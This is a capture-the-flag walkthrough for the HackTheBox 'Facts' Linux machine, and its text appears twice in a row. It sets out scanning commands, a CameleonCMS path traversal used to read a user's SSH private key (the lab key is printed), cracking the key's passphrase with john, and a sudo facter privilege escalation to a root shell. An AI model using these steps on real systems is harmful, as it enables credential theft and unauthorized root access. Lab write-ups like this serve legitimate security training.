Feb 05, 2026, 08:36 AM
FACTS - HACKTHEBOX
LINUX - EASY
IP: 10.129.69.95 (ull have a different ip)
users
-----
william
trivia
recon
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)
22/OpenSSH 9.9p1
80/nginx 1.26.3
- path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)
54321/http
exploit
------------
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:
http://facts.htb/admin/media/download_pr...id_ed25519 (remplate , by . for the path, BF block me)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=
-----END OPENSSH PRIVATE KEY-----
bruteforced the passphrase:
ssh2john id_ed25519 > hash.txt
john --wordlist=rockyou.txt hash.txt
password: dragonballz
ssh login as trivia:
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)
privesc
-------
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash
mkdir -p /tmp/.exploit/facter
in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)
https://pastebin.com/Pd4vBWHZ
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter
/bin/bash -p
got root
LINUX - EASY
IP: 10.129.69.95 (ull have a different ip)
users
-----
william
trivia
recon
-----
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.129.69.95 (ctf only)
22/OpenSSH 9.9p1
80/nginx 1.26.3
- path traversal on CameleonCMS 2.9.0 CVE-2024-46987 (base vuln version 2.8.0 but works on 2.9.0)
54321/http
exploit
------------
grabbed /home/trivia/.ssh/id_ed25519 via path traversal:
http://facts.htb/admin/media/download_pr...id_ed25519 (remplate , by . for the path, BF block me)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCd4lFW9D
oZ28sQDBe+ZIltAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAILNlyBF4wULHGQax
bUqV/3L712nR8jkzuG2DHrCPy9r/AAAAoILU2uUq5EuFWxb49m7/O1r+jOXkqJFPDFW3Sx
64HaSutBpMBTpNIWf6RviD/iEjRXHM7dKr6LBzu6PiZ3iA82tlbhAKqfZ9WvWYINhYxiQL
G3jKAVqOn5q6D7s5NSxOe6mOW1d5fshHZXKBqqU3WOt9Wvh9/yCZovIhIRK7/GcXCZdTVY
1Mce3bg0ERwrOixPG5d0SvnvdSLvIzcvaI/+w=
-----END OPENSSH PRIVATE KEY-----
bruteforced the passphrase:
ssh2john id_ed25519 > hash.txt
john --wordlist=rockyou.txt hash.txt
password: dragonballz
ssh login as trivia:
ssh -i id_ed25519 trivia@facts.htb (password: dragonballz)
privesc
-------
sudo -l shows /usr/bin/facter - exploited it to create SUID on bash
mkdir -p /tmp/.exploit/facter
in /tmp/.exploit/facter/root.rb add this code: (sorry breachforum blocks me when i wanna write the code directly on the writeup, so heres a pastebin)
https://pastebin.com/Pd4vBWHZ
sudo /usr/bin/facter --custom-dir /tmp/.exploit/facter
/bin/bash -p
got root